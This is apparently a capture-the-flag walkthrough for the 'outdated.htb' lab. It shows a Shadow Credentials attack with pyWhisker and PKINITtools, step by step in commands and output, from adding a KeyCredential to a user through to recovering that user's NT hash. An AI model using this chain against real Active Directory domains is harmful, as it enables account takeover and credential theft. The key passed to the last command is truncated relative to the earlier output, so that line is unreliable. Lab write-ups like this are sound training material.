Windows Remote Shadow Credentials
PyWhisker
If we use pyWhisker,we need to have credential.
With creds,I can try to remotely run PyWhisker.It fails:
python3 /opt/pywhisker/pywisker.py --action list -d outdated.htb
-u btables -p 5myBPLPDKT3Bfq
--dc-ip 10.10.11.175 -t 10.10.11.175
[!] automatic bind not successful - strongerAuthRequired
This shows that the LDAP bind failed,TLS is required.Adding --use-ldaps fixes it:
python3 /opt/pywhisker/pywhisker.py --action list -d outdated.htb
-u btables -p 5myBPLPDKT3Bfq --dc-ip 10.10.11.175
-t sflowers --use-ldaps
[*] Searching for the target account
[*] Target user found: CN=Susan Flowers,CN=Users,DC=outdated,DC=htb
[*] Attribute msDS-KeyCredentialLink is either empty or user does not
have read permissions on that attribute
sflowers has no shadow credentials.Add one:
python3 /opt/pywhisker/pywhisker.py --action add -d outdated.htb -u btables -p 5myBPLPDKT3Bfq --dc-ip 10.10.11.175 -t sflowers --use-ldaps [*] Searching for the target account [*] Target user found: CN=Susan Flowers,CN=Users,DC=outdated,DC=htb [*] Generating certificate [*] Certificate generated [*] Generating KeyCredential [*] KeyCredential generated with DeviceID: fddf766d-4eb3-193f-169f-42afc68ae6da [*] Updating the msDS-KeyCredentialLink attribute of sflowers [+] Updated the msDS-KeyCredentialLink attribute of the target object [+] Saved PFX (#PKCS12) certificate & key at path: alTWylpv.pfx [*] Must be used with password: CpgwxPvDtXvsf4wNjjgN [*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools
We have successfully generate keyCredential.
Follow the hint,the TGT can be obtained with PKINITtools
python3 /opt/PKINITtools/gettgtpkinit.py -cert-pfx alTWylpv.pfx
-pfx-pass CpgwxPvDtXvsf4wNjjgN outdated.htb/sflowers sflowers.ccache
-dc-ip 10.10.11.175
2022-08-03 23:09:10,618 minikerberos INFO Loading certificate and key from file INFO:minikerberos:Loading certificate and key from file 2022-08-03 23:09:10,630 minikerberos INFO Requesting TGT INFO:minikerberos:Requesting TGT 2022-08-03 23:09:10,826 minikerberos INFO AS-REP encryption key (you might need this later): INFO:minikerberos:AS-REP encryption key (you might need this later): 2022-08-03 23:09:10,826 minikerberos INFO 91229b2482fcba24d91bd4a57e5d04cd403eba67c60a83d70ff39a72ee571f8f INFO:minikerberos:91229b2482fcba24d91bd4a57e5d04cd403eba67c60a83d70ff39a72ee571f8f 2022-08-03 23:09:10,831 minikerberos INFO Saved TGT to file INFO:minikerberos:Saved TGT to file
Time skew,fix that by disabling the VirtualBox service that messages the time in my VM (sudo service vboxadd-service stop) and then running sudo rdate -n 10.10.11.175.
The next step,run the getnthash.py script.
Create a virtual environment and download the denpendencies.
python3 -m venv venv source venv/bin/activate
pip3 install .
Then it worked:
export KRB5CCNAME=sflowers.ccache python3 /opt/PKINITtools/getnthash.py outdated.htb/sflowers
-key 91229b2482fcba24d91bd4a57e5d04cd403eba67c60a83d70ff39a72ee571f
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation [*] Using TGT from cache [*] Requesting ticket to self with PAC Recovered NT Hash 1fcdb1f6015dcb318cc77bb2bda14db5
